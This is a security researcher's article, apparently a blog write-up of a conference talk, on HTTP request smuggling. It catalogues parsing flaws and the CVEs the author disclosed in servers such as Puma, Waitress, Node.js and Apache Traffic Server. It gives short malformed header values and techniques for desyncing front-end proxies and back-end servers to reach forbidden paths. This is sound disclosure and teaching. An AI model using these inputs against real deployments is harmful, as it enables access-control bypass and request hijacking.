HTTP Request Smuggling in the Multiverse of Parsing Flaws
Nowadays, novel HTTP request smuggling techniques rely on subtle deviations from the HTTP standard. Here, I discuss some of my recent findings and novel techniques.
Last updated
Nowadays, novel HTTP request smuggling techniques rely on subtle deviations from the HTTP standard. Here, I discuss some of my recent findings and novel techniques.
Last updated
Some time earlier this year, I conducted a bit of independent research on HTTP request smuggling and found a couple of vulnerabilities.
This article expands on my talk on the topic at BSides Singapore 2022.
To understand HTTP request smuggling, we have to first take a trip down memory lane.
The HTTP protocol has undergone several changes since its inception, and the latest protocol version is HTTP/3. While HTTP/2 is the most popular version today, HTTP/1.x still comprises a significant amount of web traffic and is crucially important in understanding HTTP request smuggling.
The major difference between HTTP/1.x and HTTP/2 is the fact that HTTP/2 evolved from a purely text-based protocol to a binary protocol. In HTTP/1.x, the Content-Length
and Transfer-Encoding
headers determined the length of an HTTP request. It is this reliance on two special headers that enabled the earliest discoveries of HTTP request smuggling.
But this alone is not enough. In HTTP/1.0, one TCP connection is used for each HTTP request - any two HTTP requests cannot interfere with each other. With HTTP/1.1 came along, the concept of persistent connections was introduced. This introduced an entirely new vector of attack - if one request earlier in the TCP stream could interfere with another downstream request, a variety of vulnerabilities could occur.
This becomes particularly relevant when considering architectures comprising a frontend proxy (such as Nginx, Apache HTTP Server and HAProxy) with backend web servers. Consider the following example.
The frontend proxy parses the Content-Length
header, forwarding the GET /internal
request as part of the 53-byte request body.
The backend web server, on the other hand, parses the Transfer-Encoding: chunked
header and interprets the first request to end at the 0
chunk size. This meant that from the perspective of the backend server, there are two requests - one to /
and one to /internal
.
Note that in this case, the backend is spec-compliant and the frontend proxy is not. According to RFC7230 section 3.3.3, the Transfer-Encoding
header overrides the Content-Length
.
If a message is received with both a Transfer-Encoding and a Content-Length header field, the Transfer-Encoding overrides the Content-Length. Such a message might indicate an attempt to perform request smuggling (Section 9.5) or response splitting (Section 9.4) and ought to be handled as an error. A sender MUST remove the received Content-Length field prior to forwarding such a message downstream.
This section would be split into different groups of parsing flaws. Because I often compile multiple issues into a single report, the resulting CVEs comprise of multiple issues. It is more meaningful to discuss the various types of issues rather than each CVE individually.
When I was looking into various web servers and proxies, I noticed some things that I would like to point out.
First, it seems like lots of research has been done on web proxy technologies, but not a lot has been done on backend servers. This is also reflected in the relative security of projects like Nginx and HAProxy against request smuggling. It is important to note that in most cases, a request smuggling attack reveals a two-pronged issue that requires both the frontend proxy and the backend server to be somewhat non-compliant.
This sometimes makes it difficult to demonstrate impact when disclosing vulnerabilities, as the impact often has to be qualified with a precondition that some other server in the stack is also non-compliant. It is important for maintainers not to dismiss request smuggling vectors as low impact or insignificant just because of this.
Second, most "traditional" request smuggling techniques have been patched. These are techniques that have been popularly taught and demonstrated, for example:
Duplicate Content-Length
headers (CL.CL)
Frontend server uses Content-Length
, backend uses Transfer-Encoding
(CL.TE)
Frontend server uses Transfer-Encoding
, backend uses Content-Length
(TE.CL)
The next part of this article will discuss subtle deviations from the HTTP standard that can lead to request smuggling. These are vectors that may seem trivial but are often neglected.
Last, when implementing RFC7230, often the SHOULD
clauses are equally important in preventing HTTP request smuggling. Sometimes differences in interpreting such clauses can lead to disagreements between servers.
According to the RFC, the Content-Length
value comprises of any number of DIGIT
s.
A DIGIT
in the ABNF standard consists of strictly 0-9 only. However, due to number parsing implementations, many parsers will accept non-conformant values like +23
.
Consider the following requests.
In a previous version of Apache Traffic Server, the +23
content length is silently ignored, and the first request is interpreted as having zero content length.
Many web servers, however, will interpret +23
as a valid content length. This means that the requests will now be interpreted very differently. The first request has a 23-byte body, ending at the Dummy
header.
The second request will now instead be routed to /forbidden
.
This starts to get more interesting when negative numbers are involved. For example, the following was the behaviour of Twisted Web when encountering negative content lengths.
Chunk sizes also present a similar issue - servers should not accept the 0x
prefix. Because of differences in parsing hexadecimal numbers, this simple request can be interpreted differently.
Some parsers will simply parse the number up to the first non-hex digit. This leads to the early termination of the request and consequently the smuggling of a second request.
We can see how language-specific behaviour plays a part in these scenarios. In fact, the behaviour of the Python-based servers was in line with how int()
handles integer strings, and Puma's behaviour was in line with Ruby's to_i
(which parses integer strings up to the first non-decimal character).
CVE-2022-24761
Waitress (Python)
Accept ‘signed’ (±) and 0x-prefixed Content-Length
and chunk sizes
CVE-2022-24801
Twisted (Python)
Accept ‘signed’ (±) and 0x-prefixed Content-Length
and chunk sizes
CVE-2022-24790
Puma (Ruby)
abc → 0
99 balloons → 99
Headers allow for optional whitespace (OWS
) before and after the field values.
Importantly, only two whitespace characters are considered valid here - space and horizontal tab. But this definition of whitespace is often incompatible with that of generic stripping functions in most programming languages.
Consider the following request. If a proxy were to interpret the transfer coding as \rchunked
, this may be interpreted as an invalid encoding and ignored.
The second request would then contain a 23-byte body including GET /admin
.
But a server that incorrectly strips the \r
character from the Transfer-Encoding
header would not see it the same way.
A much more classic technique involves whitespace between the header names and colon. By stripping the header names of whitespace, headers like Content-Length : 5
were allowed in mitmproxy. This particular case is clearly addressed in the RFC.
CVE-2022-28129
Apache Traffic Server
Content-Length[\x0b]: 0
accepted
CVE-2022-24766
mitmproxy (Python)
Content-Length[SP]: X
accepted
CVE-2022-1705
net/http (Golang)
Transfer-Encoding: \rchunked
accepted
A quick primer on the Transfer-Encoding
header - encodings are stated from first to last, so gzip, chunked
would mean that the decoding server needs to decode the chunked
body as gzip
data.
According to RFC 7230, chunked
must be the final value in the Transfer-Encoding
header.
But the deprecated RFC 2616 actually allows the identity
encoding, which means "the use of no transformation whatsoever". In fact, in this RFC, the chunked
transfer-coding is only used when the Transfer-Encoding
value is not identity
.
Puma, in particular, assumed the opposite - as long as any of the Transfer-Encoding
values is chunked
, the message is parsed with chunked encoding. This means that the following request is considered chunked
, although the final transformation is identity
.
Up till recently, many major proxies still supported the identity
transfer-coding. This meant that any of these proxies used in combination with Puma would have allowed for request smuggling through the above request.
It is also important to reject any invalid Transfer-Encoding
value. Servers often accept invalid values due to parsing flaws, and silently ignoring these malformed transfer-codings opens the door to request smuggling. When no supported Transfer-Encoding
values are found, Puma would silently ignore the header altogether.
This is a good example of how research on web servers is equally important to that on web proxies. While the argument could be made that the fault lies with Apache Traffic Server for accepting the malformed "chunked"
value, the attack would not have been possible if Puma threw a 400 Bad Request
when encountering it.
Because of the variability of the Transfer-Encoding
header, the parsing behaviour of various servers when it comes to this header is quite interesting. In particular, I noted an interesting behaviour in the Node.js http
module.
In the original code, when chunked
is matched, a check is made to see if chunked
is the final encoding. If a CRLF sequence is encountered, chunked
is taken to be the final encoding, and the request body will be parsed as chunked. Otherwise, it attempts to match chunked
again.
But this logic forgets to look for a ,
seperator if the CRLF sequence is not found, meaning that the following is a valid chunked request.
CVE-2022-24766
Puma (Ruby)
Does not check that chunked is the final encoding
Silently ignores invalid encodings
CVE-2022-1705
http (Node.js)
Accepts malformed encodings, e.g. chunkedchunked
Historically, multi-line headers were allowed by starting each extra line with either a space or horizontal tab. RFC 7230 deprecates such line-folding (obs-fold
).
For backwards compatibility, obs-fold
is supported by most servers. This is spec-compliant.
The trouble begins when implementing the rest of the spec while supporting obs-fold
. As we saw above, one assumption made by the Node.js parser was that the Transfer-Encoding
header would end when encountering the CRLF sequence - chunked
followed by CRLF would mean that the transfer-coding is chunked
.
This makes sense until we consider that the parser also supports obs-fold
, so the following multi-line header would be interpreted wrongly.
Instead of parsing the transfer-coding as identity
, chunked
is used instead.
CVE-2022-32215
http (Node.js)
Early termination of multi-line Transfer-Encoding
headers.
This discussion was not included in my talk because this is a slightly more contested topic and it is sometimes ambiguous whether this is a legitimate issue.
Note that each line above is delimited by the CRLF sequence.
If a proxy strictly delimits each line by CRLF and incorrectly allows the \n
character as a valid character in header values, a backend that delimits each line by only a bare LF will interpret the requests as
While this seems dangerous, the spec actually allows for a single LF to be used to delimit lines, albeit in a MAY
clause.
Some servers like Waitress and Node.js have taken this potential vector into consideration and switched to the most-spec-compliant method of delimiting lines with the CRLF sequence.
There are some individual findings that didn't fit into any of the above groups but are interesting to discuss nonetheless. This discussion was not included in my talk for brevity.
This one is a relatively common technique. Puma allowed multiple Content-Length
headers.
Note that internally, this will result in a final Content-Length
value of 0, 5
, but Ruby's to_i
function will stop parsing at the first non-decimal character, and therefore the first Content-Length
header is used to determine the request length. This is non-compliant.
If an upstream proxy processes the second Content-Length
header instead, request smuggling attacks can occur.
This one is quite interesting. According to the RFC, whitespace between the start-line and the first header field is not allowed. It even explicitly mentions the associated security risks.
Node.js allowed whitespace in this location, leading to some potentially interesting vectors. In the following request, the content length header name is taken to be the literal string " Content-Length"
and different from the normal "Content-Length"
header. It is therefore not indicative of the request body.
If a frontend proxy parses the malformed Content-Length
header, smuggling attacks can occur. However, I have yet to find a proxy that exhibits such behaviour - most will correctly reject the request as per the RFC.
Since there was limited demonstrable impact, this was handled by the Node.js team as a public issue.
Previously we discussed how HTTP/2 uses a binary protocol, instead of the text-based one that HTTP/1.x used. Each HTTP/2 data frame now had an associated length field built into the protocol, ensuring that there is no ambiguity in HTTP/2 request body lengths.
While this sounds good on paper, taking a closer look at the type of architecture required for request smuggling attacks reveals that many of our old techniques are still relevant here.
Even if HTTP/2 is used between the client and frontend proxy, there is no real reason to use HTTP/2 between the proxy and its backend servers. This means that HTTP/2 requests are often rewritten to HTTP/1.x before being forwarded to HTTP/1.x backend servers.
One interesting consequence of this was that since the CRLF sequence was no longer used to delimit request lines in HTTP/2, we could potentially perform CRLF injection on the downgraded HTTP/1.1 request by simply supplying these characters in a HTTP/2 header.
I came across one interesting application of this in Apache Traffic Server. By injecting the CRLF sequence in the HTTP/2 headers frame, we could inject new headers into the rewritten HTTP/1.1 request. More broadly, we could also modify everything below the injection point, including the request body.
While header injection can be sufficient to cause smuggling attacks, I noticed an interesting aspect of this particular vulnerability. Any headers added below our injection point could be forced into the request body by injecting the double-CRLF sequence.
Consider a request that stores the request body that can be later recovered. Sensitive headers being pushed into the request body might lead to information leakage, depending on the application logic.
CVE-2022-25763
Apache Traffic Server
CRLF injection when downgrading from HTTP/2 to HTTP/1.1
Just as I'm writing this, new research has been released on client-side desync attacks. I found this new development particularly interesting because it forces a paradigm shift on how we approach smuggling attacks. Client-side desync does not require a proxy-server architecture, only a browser and a single web server.
It would be interesting to see how the community will build on this research to find new and interesting discoveries.